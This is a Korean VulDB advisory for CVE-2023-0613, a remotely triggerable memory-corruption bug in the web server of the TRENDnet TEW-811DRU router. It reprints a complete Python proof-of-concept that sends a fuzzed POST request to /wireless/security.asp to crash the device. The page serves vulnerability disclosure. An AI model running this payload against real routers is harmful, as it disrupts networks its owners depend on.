TRENDnet TEW-811DRU 1.0.10.0 httpd /wireless/security.asp 메모리 손상
| CVSS 메타 임시 점수 | 현재 익스플로잇 가격 (≈) | CTI 관심 점수 |
|---|---|---|
| 7.3 | $0-$5k | 0.00 |
요약
현재 TRENDnet TEW-811DRU 1.0.10.0에서 비판적인로 분류된 취약점이 발견되었습니다. 해당 사항은 알 수 없는 함수 파일 /wireless/security.asp의 컴포넌트 httpd의에 해당합니다. 이 작업 메모리 손상을(를) 초래할 수 있습니다. 이 취약점은 CVE-2023-0613로 식별됩니다. 원격으로 공격을 개시하는 것이 가능합니다. 또한, 익스플로잇이 존재합니다.
세부
현재 TRENDnet TEW-811DRU 1.0.10.0에서 비판적인로 분류된 취약점이 발견되었습니다. 해당 사항은 알 수 없는 함수 파일 /wireless/security.asp의 컴포넌트 httpd의에 해당합니다. 이 작업 메모리 손상을(를) 초래할 수 있습니다. CWE를 이용해 문제를 정의하면 CWE-119로 안내됩니다. 이 취약성은 공개되었습니다 2023. 02. 01..
이 취약점은 CVE-2023-0613로 식별됩니다. 원격으로 공격을 개시하는 것이 가능합니다. 기술적 정보가 있습니다. 이 취약점은 평균에 비해 인기가 낮은 편입니다. 또한, 익스플로잇이 존재합니다. 해당 익스플로잇이 공개되어 악용될 수 있습니다. 지금 기준으로 익스플로잇 가격은 대략 USD $0-$5k 로 보입니다.
개념 증명로 지정됩니다. 익스플로잇이 다운로드를 위해 vuldb.com에 게시되었습니다. 0-day로서 추정된 지하 가격은 약 $0-$5k였습니다. 다음은 익스플로잇에 사용된 코드입니다:
import requests,socket import re import time from urllib.parse import urlencodedevice_web_ip = '192.168.10.1'
request = {'HEAD': {'Host': b'Z', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': b',\x80gpsiation//xm', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': b'enc\xbc\xbc\xbc', 'Content-Length': '1209', 'Origin': 'http://0.0.0.0:8080', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8080/wireless/security.asp', 'Cookie': 'expandable=3c', 'Upgrade-Insecure-Requests': b'\x1d2' }, 'PARAM': {b'ecOe': b'/wireless/srcuri\x81\x80.asp', b'\x86od}': 'Qy4zq80U9FFhnKc0BBTA', 'wl_wps_mode': b'd\x10saDte\x80', b'\x96\x96': b' 5', 'wl_bssid': b'SS', 'security_mode': b'OO:E', b'\x88l\x88l_eu_aZ': 0, 'wl_auth_mode': 'none', b'cc@@zw(': 'enabled', 'wl_akm': b'', 'wl_akm_wpa': b'b\x85nd', 'wl_akm_psk': 'disabled', 'wl_akm_wpa2': b'disniled', 'wl_akm_psk2': b'\xd3isabled', 'wl_wai_cert_index': '', 'wl_wai_cert_status': '', b'\x00\xffak\xffakvv_w': 'disabled', b'wkm_wl_akm_wapi\x05\xff\xff': 'disabled', 'wl_key': 2, b'\x01': 'abcde', b'wl{k@{': 'abcdefabcdefe', b'Sk': b'\x01\x8b\x00', b'7l_+ey': b'a\x80\x00\x00\x01\x8f', 'wl_macmode': b'a\x1c(\x1a\xc2\xba\x04\x00al', 'wl_maclist': 48, b'\x7fmmAc3t0t0': '00:0c:29:d9:40:fe', b'wl_mac\xc3\x8f?\xc3\x86\x045\x00\x80\x1b\xc3\x88\xc3\x96\xc3\xa4S\xc2\x96\xc2\x96$\x00Dh\xc3\xb4\xc3\x9flis\xc3\x8b\x0bX>\t\xc2\xaaQ\x03': '00:0c:29:d9:40:ff', b'glFqacKist2': b'2:0c\x8029::@BJ40!fd', b'lmaylistaclma': '', 'wl_maclist4': '', 'wl_maclist5': b'', b'wleAaclb\x7fg': b'', 'wl_maclist7': b'', b'l_++++wlP++++++*+': '', 'wl_maclist10': b'', 'wl_maclist11': b'', b'w\xff\xff\xee\xff\x86ist\x80\x002': b'', b'wl_wlcl\x05\xff\xff\x053': '', b'hl@\x81B_\x7f\xff\x00\xff14': b'', b'w@_maclis': '', 'wl_maclist16': b'', b'wU_maczist17': b'', 'wl_maclist18': b'', 'wl_maclist19': b'', b'w\xc2\x98\x0b$jl\x87mlym
c\x9ai': b'', b'w|\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1': b'', b'a\x00\x00\x02\x00': '', 'wl_maclist23': '', 'wl_maclist24': b'', b'\xa9\x14\twl_maclis\xa9\x14\twl_maclist2': '', 'wl_maclist26': b'', 'wl_maclist27': '', 'wl_maclist28': '', b'wl_l_m\xba\xba\xba\xba\xba\xba': b'', b'l\xff\xff\xfd\xff\xff': b'', 'wl_maclist31': b'', b'J': b'', b'wl_macli\xfft\x00\x02': b'', 'wl_maclist34': b'', 'wl_maclist35': '', b'\x8dlTmaclist36': '', 'wl_maclist37': '', 'wl_maclist38': '', 'wl_maclist39': '', 'wl_maclist40': '', b'sl_maclicl': '', b'\x90l': b'', b'wW_maclist4\xb3': '', 'wl_maclist44': b'', 'wl_maclist45': '', 'wl_maclist46': b'', 'wl_maclist47': b'', b'\x00\x08\x7f': 'Apply', 'wan_apply': '<!--#tr id=', 'mg.alert.7': '', 'wl_key4': b'Q', b'alg.alg.05': b'', 'wl_maclist15': b'', 'expandable': b'', b'\xff\xff\xff\xff45': 4 }, 'ATTR': {'URL': 'http://{}/wireless/security.asp'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1' } }
headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL']
try: r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5) print('Finish attack, to check web state.') except Exception as e: print('error:{}'.format(e))
제품
공급 업체
이름
버전
특허
CPE 2.3
CPE 2.2
CVSSv4
VulDB 벡터: 🔍VulDB 신뢰성: 🔍
CVSSv3
VulDB 메타 베이스 점수: 7.5VulDB 메타 임시 점수: 7.3
VulDB 기본 점수: 7.5
VulDB 임시 점수: 6.8
VulDB 벡터: 🔍
VulDB 신뢰성: 🔍
NVD 기본 점수: 7.5
NVD 벡터: 🔍
CNA 기본 점수: 7.5
CNA 벡터 (VulDB): 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 벡터 | 복잡성 | 인증 | 기밀성 | 진실성 | 유효성 |
|---|---|---|---|---|---|
| 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 |
| 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 |
| 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 |
VulDB 기본 점수: 🔍
VulDB 임시 점수: 🔍
VulDB 신뢰성: 🔍
NVD 기본 점수: 🔍
악용
수업: 메모리 손상CWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍
물리적인: 아니요
현지: 아니요
원격: 네
유효성: 🔍
접근: 공개
상태: 개념 증명
프로그래밍 언어: 🔍
다운로드: 🔍
Google Hack: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
가격 예측: 🔍
현재 가격 추정: 🔍
| 0-Day | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 |
|---|---|---|---|---|
| 오늘 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 |
위협 인텔리전스
관심: 🔍활성 배우: 🔍
활성 APT 그룹: 🔍
대책
추천: 알려진 완화 방법 없음상태: 🔍
0일 시간: 🔍
타임라인
2023. 02. 01. 🔍2023. 02. 01. 🔍
2023. 02. 01. 🔍
2023. 03. 01. 🔍
출처
상태: 정의되지 않음CVE: CVE-2023-0613 (🔍)
GCVE (CVE): GCVE-0-2023-0613
GCVE (VulDB): GCVE-100-219937
scip Labs: https://www.scip.ch/en/?labs.20161013
항목
만들어진: 2023. 02. 01. PM 02:44업데이트됨: 2023. 03. 01. AM 11:37
변경 사항: 2023. 02. 01. PM 02:44 (40), 2023. 02. 01. PM 02:45 (2), 2023. 02. 01. PM 05:52 (1), 2023. 03. 01. AM 11:30 (2), 2023. 03. 01. AM 11:37 (27)
완벽한: 🔍
제출자: leetsun
Cache ID: 216::103
제출
수락
- 제출 #76278: Web crash on TRENDnet router TEW-811DRU (\~에 의해 leetsun)
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
아직 댓글이 없습니다. 언어: ko + en.
댓글을 작성하려면 로그인하세요.